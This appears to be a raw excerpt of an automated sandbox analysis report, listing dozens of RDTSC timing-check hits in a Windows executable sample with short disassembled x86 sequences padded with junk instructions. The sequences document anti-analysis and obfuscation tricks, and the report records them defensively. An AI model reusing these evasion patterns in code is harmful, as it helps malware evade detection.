                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57CEE second address: B57CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57CF4 second address: B57D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB3DD280BB8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B57D0A second address: B57D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95F0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76318 second address: B7631C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B7631C second address: B76342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB3DD3D95F4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76900 second address: B7690A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB3DD280BB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76A88 second address: B76A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB3DD3D95E6h 0x00000009 jo 00007FB3DD3D95E6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76A9B second address: B76AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76C17 second address: B76C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB3DD3D95F0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76C31 second address: B76C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76C37 second address: B76C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76C48 second address: B76C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76C4E second address: B76C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76C66 second address: B76C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76DED second address: B76DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76F48 second address: B76F5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB3DD280BBAh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B76F5B second address: B76F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD3D95F2h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB3DD3D95F5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B77336 second address: B7734A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007FB3DD280BB6h 0x00000009 jl 00007FB3DD280BB6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B77C51 second address: B77C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B77D93 second address: B77D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B77D9A second address: B77DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FB3DD3D95E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B77DA6 second address: B77DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B7DC30 second address: B7DC40 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B7DC40 second address: B7DC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B7CD94 second address: B7CDA6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FB3DD3D95E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B40D87 second address: B40D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB3DD280BB6h 0x0000000a pop ebx 0x0000000b js 00007FB3DD280BBEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B40D9C second address: B40DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FB3DD3D95EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4430D second address: B44314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B44314 second address: B4431A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4431A second address: B4434E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB3DD280BB8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FB3DD280BC5h 0x00000013 pushad 0x00000014 jno 00007FB3DD280BB6h 0x0000001a js 00007FB3DD280BB6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B82CE0 second address: B82CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B82CEF second address: B82CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B82CF7 second address: B82CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B82F72 second address: B82F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B82F78 second address: B82F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB3DD3D95E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8322C second address: B83268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC7h 0x00000009 popad 0x0000000a pop eax 0x0000000b jp 00007FB3DD280BE6h 0x00000011 pushad 0x00000012 jmp 00007FB3DD280BBEh 0x00000017 push esi 0x00000018 pop esi 0x00000019 jng 00007FB3DD280BB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B83268 second address: B8327A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FB3DD3D95E6h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B834F1 second address: B834FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB3DD280BB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B834FD second address: B83501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B83501 second address: B83505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86277 second address: B8627B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86B60 second address: B86B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86FB1 second address: B86FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B86FB7 second address: B86FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8708C second address: B87092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87159 second address: B8715D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87620 second address: B8762A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8762A second address: B87691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 xchg eax, ebx 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB3DD280BB8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 call 00007FB3DD280BC1h 0x00000026 sbb edi, 01D7E7C0h 0x0000002c pop esi 0x0000002d nop 0x0000002e pushad 0x0000002f jnl 00007FB3DD280BB8h 0x00000035 push esi 0x00000036 pop esi 0x00000037 jmp 00007FB3DD280BBCh 0x0000003c popad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 jmp 00007FB3DD280BBCh 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87691 second address: B8769B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87764 second address: B87768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87768 second address: B8778B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FB3DD3D95F8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B87B12 second address: B87B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8800C second address: B88013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B88831 second address: B88837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B88837 second address: B8883D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B89A17 second address: B89A21 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8918A second address: B8918E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8918E second address: B8919F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8A3FD second address: B8A460 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FB3DD3D95E8h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FB3DD3D95E8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 push 00000000h 0x00000032 cld 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 mov ebx, 75241CFBh 0x0000003b jo 00007FB3DD3D95ECh 0x00000041 mov dword ptr [ebp+122D384Dh], edi 0x00000047 popad 0x00000048 sbb si, B283h 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB3DD3D95ECh 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8919F second address: B891A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B891A6 second address: B891AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8D014 second address: B8D01A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8D01A second address: B8D090 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D2B3Eh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FB3DD3D95E8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FB3DD3D95E8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 jmp 00007FB3DD3D95F2h 0x0000004c jnc 00007FB3DD3D95E8h 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 pop edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8D090 second address: B8D09A instructions: 0x00000000 rdtsc 0x00000002 js 00007FB3DD280BBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8C7 second address: B8B8E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8C34C second address: B8C350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8CE0E second address: B8CE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8E2 second address: B8B8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8E8 second address: B8B8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9198D second address: B91991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8F4 second address: B8B906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B906 second address: B8B90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92E4E second address: B92E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92140 second address: B92145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92E52 second address: B92E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92E56 second address: B92E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B93FE9 second address: B94007 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB3DD3D95ECh 0x0000000c jc 00007FB3DD3D95E6h 0x00000012 popad 0x00000013 push eax 0x00000014 jp 00007FB3DD3D960Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B94007 second address: B9400B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95024 second address: B9502D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9502D second address: B95031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95031 second address: B95035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95035 second address: B9504B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FB3DD280BBCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B942BA second address: B942C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B942C0 second address: B942E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FB3DD280BB6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B942E5 second address: B94300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95275 second address: B95279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95279 second address: B9527F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9527F second address: B95289 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB3DD280BBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B991CA second address: B991CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B991CE second address: B991E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9845B second address: B98465 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD3D95ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9B72E second address: B9B735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
